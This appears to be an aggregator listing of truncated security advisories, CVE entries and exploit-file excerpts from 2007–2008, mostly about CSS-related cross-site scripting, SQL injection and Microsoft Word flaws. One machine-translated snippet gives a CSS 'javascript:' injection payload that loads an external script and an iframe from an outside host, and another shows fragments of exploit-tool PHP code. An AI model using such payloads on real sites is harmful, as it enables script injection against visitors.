[SECURITY] Fedora 7 Update: roundcubemail-0.2-0.alpha.fc7.1

RoundCube Webmail is a browser-based multilingual IMAP client with an application-like user interface. It provides full functionality you expect from an e-mail client, including MIME support, address book, folder manipulation, message searching and spell checking. RoundCube Webmail is written in...

erfurtwiki-lfi.txt

/ | || | | | | | | | | /| | | | | || ||| ||||| || C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org Hacks In Taiwan | || | | | | | | | Conference 2008 | | | | | | | | | || ||| || |||| http://www.hitcon.org Title =======:: ErfurtWiki = R1.02b css Local...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in F5 FirePass SSL VPN 6.0.2 hotfix 3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via quotes in 1 the cssexceptions parameter in vdesk/admincon/webyfiers.php and 2 the sqlmatchscope parameter in...

CVE-2008-2637

Multiple cross-site scripting XSS vulnerabilities in F5 FirePass SSL VPN 6.0.2 hotfix 3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via quotes in 1 the cssexceptions parameter in vdesk/admincon/webyfiers.php and 2 the sqlmatchscope parameter in...

iDefense Security Advisory 05.13.08: Microsoft Word CSS Processing Memory Corruption Vulnerability

iDefense Security Advisory 05.13.08 http://labs.idefense.com/intelligence/vulnerabilities/ May 13, 2008 I. BACKGROUND Microsoft Word is a word processing application that is distributed with Microsoft Office. Cascading Style Sheets CSS is a stylesheet language used to describe the presentation of...

Microsoft Word multiple security vulnerabilities

Memory coruption on RTF parsing, memory corruption on CSS parsing...

CVE-2008-1434

CVE-2008-1434 describes a remote code execution vulnerability in Microsoft Word caused by a memory handling error when processing a Word file containing a malformed CSS value. The issue affects Word across multiple products/versions (Office 2000 SP3, Word 2000; Word XP SP3; Word 2003 SP2/SP3; Wor...

Microsoft Word Cascading Style Sheet Processing Code Execution (MS08-026; CVE-2008-1434)

Microsoft Word is a popular word processing software. A remote code execution vulnerability has been identified in Microsoft Word. A remote attacker could exploit this issue via a malformed Word file. The vulnerability is due to a memory calculation error in Microsoft Word that fails to properly...

miniBB 2.2 (CSS/SQL/FPD) Multiple Remote Vulnerabilities

No description provided by source. Author: GiReX Homepage: girex.altervista.org Date: 21/04/2008 CMS: miniBB 2.2 and maybe prior Site: minibb.net Bug 1: Full Path Disclosure Bug 2: Cross Site Scripting Bug 3: Remote SQL Injection Need: registerglobals = On ---------------------------------------...

Cross site scripting

Cross-site scripting XSS vulnerability in the private message feature in Nuke ET 3.2 and 3.4, when using Internet Explorer, allows remote authenticated users to inject arbitrary web script or HTML via a CSS property in the STYLE attribute of a DIV element in the mensaje parameter. NOTE: some of...

CVE-2008-1873

Cross-site scripting XSS vulnerability in the private message feature in Nuke ET 3.2 and 3.4, when using Internet Explorer, allows remote authenticated users to inject arbitrary web script or HTML via a CSS property in the STYLE attribute of a DIV element in the mensaje parameter. NOTE: some of...

CVE-2008-1873

CVE-2008-1873 is a cross-site scripting (XSS) vulnerability in Nuke ET’s private message feature affecting Nuke ET 3.2 and 3.4. The flaw allows remote authenticated users to inject arbitrary script/HTML via a CSS property in the STYLE attribute of a DIV element within the mensaje parameter, with ...

CVE-2008-1873

Cross-site scripting XSS vulnerability in the private message feature in Nuke ET 3.2 and 3.4, when using Internet Explorer, allows remote authenticated users to inject arbitrary web script or HTML via a CSS property in the STYLE attribute of a DIV element in the mensaje parameter. NOTE: some of...

SA-2008-015 - Comment Upload - Arbitrary file upload

Comment upload enables file attachments for comments. To do so it uses and subverts various functions from the upload module that are present in Drupal core. In certain, common cases, comment upload passes incorrect data to the upload validation functions, resulting in a validation bypass, which...

Use CSS hung it using the method!- Vulnerability warning-the black bar safety net

Inserted into the css or the head of the style can be... If the plug portion of the style in this writing style type="text/css" !-- body background-image: url'javascript:document. write"script src=aa. js/script"' -- /style Call the aa. js content document. write"iframe src=http://www. winshell. c...

seagull-063-xss.txt

fuzion / // /\ / / : //\ /| : : .. / \ | | :: :: \ / | | :| || \ / | | || || |\ / | | || || | / | \ | || || | / /\ \ | || || | / / \ -/ -/ | |// \ --/ \ / / / / \ / \/ Product: Seagull STABLE 0.6.3 http://seagullproject.org/ Vulnerable: Seems that none of the theme css renderers sanatize...

domphp-admin.txt

126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,3.\d1,3:\d1,5\b'; function...

CVE-2007-6656

SQL injection vulnerability in contentcss.php in the TinyMCE module for CMS Made Simple 1.2.2 and earlier allows remote attackers to execute arbitrary SQL commands via the templateid parameter...

CVE-2007-6529

Multiple unspecified vulnerabilities in TikiWiki before 1.9.9 have unknown impact and attack vectors involving 1 tiki-editcss.php, 2 tiki-listgames.php, or 3 tiki-g-adminsharedsource.php...

From the Baidu space to China blog vulnerability-vulnerability warning-the black bar safety net

These days there are always friends to ask me in ten period of black anti-on introduction to ajax hacking degree of influence exactly how much, and how for this stage of the network status of the web2. 0 vulnerability testing, and use of, this time by means of black anti-for everyone to see for...